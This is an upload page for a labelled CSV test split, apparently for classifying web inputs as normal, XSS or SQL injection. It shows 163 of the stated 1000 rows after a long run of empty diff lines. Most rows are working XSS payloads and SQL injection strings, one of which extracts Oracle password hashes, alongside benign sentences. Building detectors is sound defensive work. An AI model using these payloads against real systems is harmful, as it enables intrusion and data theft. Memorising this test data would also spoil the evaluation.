Upload test_1000.csv
Browse files- test_1000.csv +1000 -0
test_1000.csv
ADDED
@@ -0,0 +1,1000 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
Payload,Label,text_label,ID
|
2 |
+
"{""id"":null,""firstName"":""Bang Joni"",""lastName"":""Janggut"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27169
|
3 |
+
"<style>:target {color: red;}</style><wbr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></wbr>",1,XSS,1086
|
4 |
+
"-3270"" where 2144 = 2144 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10669
|
5 |
+
<strike onpointerenter=alert(1)>XSS</strike>,1,XSS,6980
|
6 |
+
"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,13655
|
7 |
+
"1%' ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15438
|
8 |
+
"<isindex onmouseenter=""alert(1)"">test</isindex>",1,XSS,6205
|
9 |
+
"1%"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,12946
|
10 |
+
Select the best tools for the project.,3,normal,24217
|
11 |
+
"<svg onclick=""alert(1)"">test</svg>",1,XSS,9201
|
12 |
+
"<font oncontextmenu=""alert(1)"">test</font>",1,XSS,7345
|
13 |
+
<BR SIZE="&{alert('XSS')}">,1,XSS,4001
|
14 |
+
"<strong onbeforepaste=""alert(1)"" contenteditable>test</strong>",1,XSS,3232
|
15 |
+
select ( case when ( 2350 = 8682 ) then 2350 else 1/ ( select 0 ) end ) --,2,SQLi,15755
|
16 |
+
"-8344 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) -- wjpa",2,SQLi,10593
|
17 |
+
select case when 2095 = 9074 then 1 else null end--,2,SQLi,18352
|
18 |
+
"<li draggable=""true"" ondragleave=""alert(1)"">test</li>",1,XSS,4902
|
19 |
+
-4308' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'jmot' = 'jmot,2,SQLi,10630
|
20 |
+
<p onpointerdown=alert(1)>XSS</p>,1,XSS,9383
|
21 |
+
"1"" ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15518
|
22 |
+
declare @s varchar ( 8000 ) select @s = 0x73656c65637420404076657273696f6e,2,SQLi,15704
|
23 |
+
"-4477' ) ) union all select 8444,8444,8444,8444,8444,8444,8444,8444--",2,SQLi,16340
|
24 |
+
"-3315"" ) ) ) union all select 2457,2457,2457,2457,2457,2457--",2,SQLi,17036
|
25 |
+
1' ) ) ) and 7401 = 9838#,2,SQLi,21121
|
26 |
+
Where's the nature reserve?,3,normal,23596
|
27 |
+
"select * from users where id = 1 -1<@ union select 1,version ( ) -- 1",2,SQLi,16259
|
28 |
+
"1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'cpoy' = 'cpoy",2,SQLi,13123
|
29 |
+
"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337",2,SQLi,16652
|
30 |
+
"1' ) as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11097
|
31 |
+
"1"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""tzog"" like ""tzog",2,SQLi,12445
|
32 |
+
"<big draggable=""true"" ondrag=""alert(1)"">test</big>",1,XSS,5627
|
33 |
+
"-8477' union all select 2517,2517,2517--",2,SQLi,19550
|
34 |
+
<button onCellChange=javascript:alert(1)>,1,XSS,7796
|
35 |
+
1 ) ) and 3228 = 7376#,2,SQLi,21440
|
36 |
+
a' or 3 = 3--,2,SQLi,22269
|
37 |
+
"exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 1049 = 1049,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,13117
|
38 |
+
"-7306"" or 2081 = 6847",2,SQLi,21674
|
39 |
+
"?TargetAS=javascript:alert(1)"",",1,XSS,9520
|
40 |
+
"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*",2,SQLi,9895
|
41 |
+
1 ) as jqbp where 5407 = 5407 and 4595 = 4595#,2,SQLi,18922
|
42 |
+
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></i>",1,XSS,302
|
43 |
+
I want to select a movie to watch tonight.,3,normal,23969
|
44 |
+
<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus>,1,XSS,3210
|
45 |
+
"{""id"":null,""name"":""Pagumon""}",3,normal,27497
|
46 |
+
"select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( 'xori' like 'xori",2,SQLi,15132
|
47 |
+
"<ul onkeydown=""alert(1)"" contenteditable>test</ul>",1,XSS,5549
|
48 |
+
"-2982' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'iqwn' = 'iqwn",2,SQLi,10301
|
49 |
+
-4494 or 5291 = 4452,2,SQLi,21781
|
50 |
+
"1 ) ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13860
|
51 |
+
<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus>,1,XSS,2918
|
52 |
+
<html><noalert><noscript>(123)</noscript><script>(123)</script>,1,XSS,2994
|
53 |
+
"1"" ) as ltoa where 9159 = 9159 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11887
|
54 |
+
"1'+ ( select unzl where 3432 = 3432 union all select null,null,null,null--",2,SQLi,15729
|
55 |
+
"<;HEAD>;<;META HTTP-EQUIV="";CONTENT-TYPE""; CONTENT="";text/html; charset=UTF-7"";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-",1,XSS,519
|
56 |
+
"or sleep(5)=""",2,SQLi,22254
|
57 |
+
"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",2,SQLi,13482
|
58 |
+
"1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""uglh"" like ""uglh",2,SQLi,12307
|
59 |
+
Order a classic burger.,3,normal,22649
|
60 |
+
"-7700%' ) union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#",2,SQLi,15975
|
61 |
+
"In 18 3 a select committee of the House of Commons went into the whole subject of secondary punishment and reported that, as the difficulties in the way of an effective classification of prisoners were insurmountable, they were strongly in favour of the confinement of prisoners in separate cells, recommending that the whole of the prisons should be altered accordingly and the expense borne by the public exchequer.",3,normal,26029
|
62 |
+
"{""id"":null,""firstName"":"""",""lastName"":""Brolagda"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26951
|
63 |
+
1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18755
|
64 |
+
"1%"" ) ) ) union all select null,null,null,null,null,null,null--",2,SQLi,16858
|
65 |
+
"select * from users where id = 1 or \+<$ union select 1,@@VERSION -- 1",2,SQLi,16131
|
66 |
+
"-2667 ) union all select 5848,5848,5848,5848--",2,SQLi,18942
|
67 |
+
"1"" ) where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10287
|
68 |
+
1' ) ) ) and 7533 = 7533 and ( ( ( 'txex' = 'txex,2,SQLi,18623
|
69 |
+
;confirm('XSS')//1491b2as,1,XSS,9710
|
70 |
+
"1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""wvkp"" like ""wvkp",2,SQLi,12393
|
71 |
+
<input onpointerup=alert(1)>XSS</input>,1,XSS,8124
|
72 |
+
"1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'bvdw' = 'bvdw",2,SQLi,10792
|
73 |
+
Select awe.,3,normal,24735
|
74 |
+
"1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,11926
|
75 |
+
<input3 onpointerout=alert(1)>XSS</input3>,1,XSS,7356
|
76 |
+
Filter spam calls.,3,normal,22781
|
77 |
+
-9668' ) ) as orfu where 5822 = 5822 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10421
|
78 |
+
"1"" union all select null,null,null,null,null,null,null--",2,SQLi,17738
|
79 |
+
"1' ) as idqc where 5288 = 5288 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,16348
|
80 |
+
"<template draggable=""true"" ondrag=""alert(1)"">test</template>",1,XSS,3494
|
81 |
+
-8007' ) ) as bgpp where 9555 = 9555 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9956
|
82 |
+
"1"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""qyew"" = ""qyew",2,SQLi,12608
|
83 |
+
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>,1,XSS,484
|
84 |
+
Where's the townhouse?,3,normal,23565
|
85 |
+
"-3513%"" union all select 8473,8473#",2,SQLi,20026
|
86 |
+
"1"" ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16396
|
87 |
+
<content id=x tabindex=1 onbeforeactivate=alert(1)></content>,1,XSS,3337
|
88 |
+
"<hgroup onmousemove=""alert(1)"">test</hgroup>",1,XSS,6962
|
89 |
+
"1' union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,16100
|
90 |
+
"<body background=javascript:'""><script>alert(navigator.userAgent)</script>></body>",1,XSS,1923
|
91 |
+
<label id=x tabindex=1 onbeforeactivate=alert(1)></label>,1,XSS,4155
|
92 |
+
1'+ ( select shec where 3589 = 3589 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) +',2,SQLi,14828
|
93 |
+
"If you want a more detailed explanation of the process, select the button labeled ""Learn More"" and press X. When you're ready to set up two-step verification, select ""Set Up Now"" and press X.",3,normal,26048
|
94 |
+
"1%"" ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13471
|
95 |
+
1 ) ) as xzcl where 2332 = 2332,2,SQLi,20466
|
96 |
+
"<output onpaste=""alert(1)"" contenteditable>test</output>",1,XSS,4395
|
97 |
+
"<s onkeyup=""alert(1)"" contenteditable>test</s>",1,XSS,6409
|
98 |
+
"<style>:target {transform: rotate(180deg);}</style><nextid id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></nextid>",1,XSS,586
|
99 |
+
"<frameset draggable=""true"" ondragend=""alert(1)"">test</frameset>",1,XSS,3106
|
100 |
+
"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'fsvr' = 'fsvr",2,SQLi,10525
|
101 |
+
As they're offering up to 43% off select Delsey Paris luggage.,3,normal,26351
|
102 |
+
1 ) ) as qgma where 7675 = 7675 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,14749
|
103 |
+
"<plaintext onclick=""alert(1)"">test</plaintext>",1,XSS,6475
|
104 |
+
Select a password that's secure.,3,normal,24213
|
105 |
+
<input onfocus=write(XSS) autofocus>,1,XSS,8767
|
106 |
+
"<content onmousedown=""alert(1)"">test</content>",1,XSS,6330
|
107 |
+
"`-alert(1)"">'onload=""`<svg/1='",1,XSS,9570
|
108 |
+
"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11957
|
109 |
+
"1'|| ( select 'txyy' where 6500 = 6500 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ) ||'",2,SQLi,11939
|
110 |
+
"<figcaption onmouseover=""alert(1)"">test</figcaption>",1,XSS,5109
|
111 |
+
1' where 2913 = 2913 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,15416
|
112 |
+
"-5763' ) ) ) union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#",2,SQLi,15228
|
113 |
+
<shadow onpointermove=alert(1)>XSS</shadow>,1,XSS,7207
|
114 |
+
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )",2,SQLi,10911
|
115 |
+
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>,1,XSS,520
|
116 |
+
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--",2,SQLi,18653
|
117 |
+
"1 ) where 1559 = 1559 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12598
|
118 |
+
Select a type of scatter plot required then click the Define button.,3,normal,25658
|
119 |
+
"<address ondblclick=""alert(1)"">test</address>",1,XSS,6726
|
120 |
+
"select * from generate_series ( 9167,9167,case when ( 9167 = 2273 ) then 1 else 0 end ) limit 1--",2,SQLi,14282
|
121 |
+
"waitfor delay '0:0:5' and ( ( ( ""mfro"" like ""mfro",2,SQLi,18562
|
122 |
+
"1"" where 1831 = 1831 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,15506
|
123 |
+
"<small onkeydown=""alert(1)"" contenteditable>test</small>",1,XSS,4346
|
124 |
+
"<dl onkeyup=""alert(1)"" contenteditable>test</dl>",1,XSS,5984
|
125 |
+
1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'wvzb' = 'wvzb,2,SQLi,17844
|
126 |
+
"<strong onclick=""alert(1)"">test</strong>",1,XSS,8000
|
127 |
+
"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",2,SQLi,12316
|
128 |
+
"-9829' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11694
|
129 |
+
<button autofocus onfocus=alert(1)>test</button>,1,XSS,6053
|
130 |
+
"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( 'cwjd' = 'cwjd",2,SQLi,16811
|
131 |
+
1'|| ( select 'fven' where 1433 = 1433 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) ||',2,SQLi,12109
|
132 |
+
1%' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( '%' = ',2,SQLi,15505
|
133 |
+
I'll select a movie for us to watch together.,3,normal,23821
|
134 |
+
Select your exchange.,3,normal,25050
|
135 |
+
"<image onkeypress=""alert(1)"" contenteditable>test</image>",1,XSS,4145
|
136 |
+
"1%' ) union all select null,null,null,null--",2,SQLi,19140
|
137 |
+
( select * from ( select ( sleep ( 5 ) ) ) srmq ) and 'fdgq' = 'fdgq,2,SQLi,16380
|
138 |
+
"( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,17559
|
139 |
+
"<ins onmouseleave=""alert(1)"">test</ins>",1,XSS,8273
|
140 |
+
<div onblur=alert(1) tabindex=1 id=x></div><input autofocus>,1,XSS,3572
|
141 |
+
"-7531' ) ) ) union all select 6900,6900,6900,6900,6900,6900,6900,6900,6900#",2,SQLi,15645
|
142 |
+
"1 ) as wvpl where 9791 = 9791 and make_set ( 3491 = 9067,9067 ) --",2,SQLi,16606
|
143 |
+
Select an option.,3,normal,24815
|
144 |
+
"{""id"":null,""firstName"":""Ivy"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27196
|
145 |
+
"1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15449
|
146 |
+
1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( 'fuvv' = 'fuvv,2,SQLi,16055
|
147 |
+
<center onblur=alert(1) tabindex=1 id=x></center><input autofocus>,1,XSS,2760
|
148 |
+
"1"" ) ) and ( 1248 = 8705 ) *8705 and ( ( ""wvma"" like ""wvma",2,SQLi,17389
|
149 |
+
"<style>@keyframes x{}</style><small style=""animation-name:x"" onanimationstart=""alert(1)""></small>",1,XSS,1559
|
150 |
+
<img/src=`%00` onerror=this.onerror=confirm(1),1,XSS,6273
|
151 |
+
"{""id"":null,""firstName"":""Horace"",""lastName"":""Hutapea"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26756
|
152 |
+
"1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'vkde' = 'vkde",2,SQLi,12663
|
153 |
+
1' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( 'lajk' = 'lajk,2,SQLi,14822
|
154 |
+
"select * from users where id = 1 or ""$#"" or 1 = 1 -- 1",2,SQLi,17896
|
155 |
+
"<blockquote ondblclick=""alert(1)"">test</blockquote>",1,XSS,5487
|
156 |
+
"select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14384
|
157 |
+
<colgroup onpointerleave=alert(1)>XSS</colgroup>,1,XSS,5902
|
158 |
+
"select * from users where id = '1' + ( \ ) union select 1,@@VERSION -- 1'",2,SQLi,15842
|
159 |
+
"1%' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( '%' = '",2,SQLi,12038
|
160 |
+
"An English translation of the embassy to Constantinople is in Ernest Henderson's Select Documents of the Middle Ages (Bohn series, 1896).",3,normal,26376
|
161 |
+
1%' or sleep ( 5 ) and '%' = ',2,SQLi,20543
|
162 |
+
"1 ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 4510 = 4510",2,SQLi,12481
|
163 |
+
"make_set ( 6174 = 9734,1 )",2,SQLi,20986
|
164 |
+
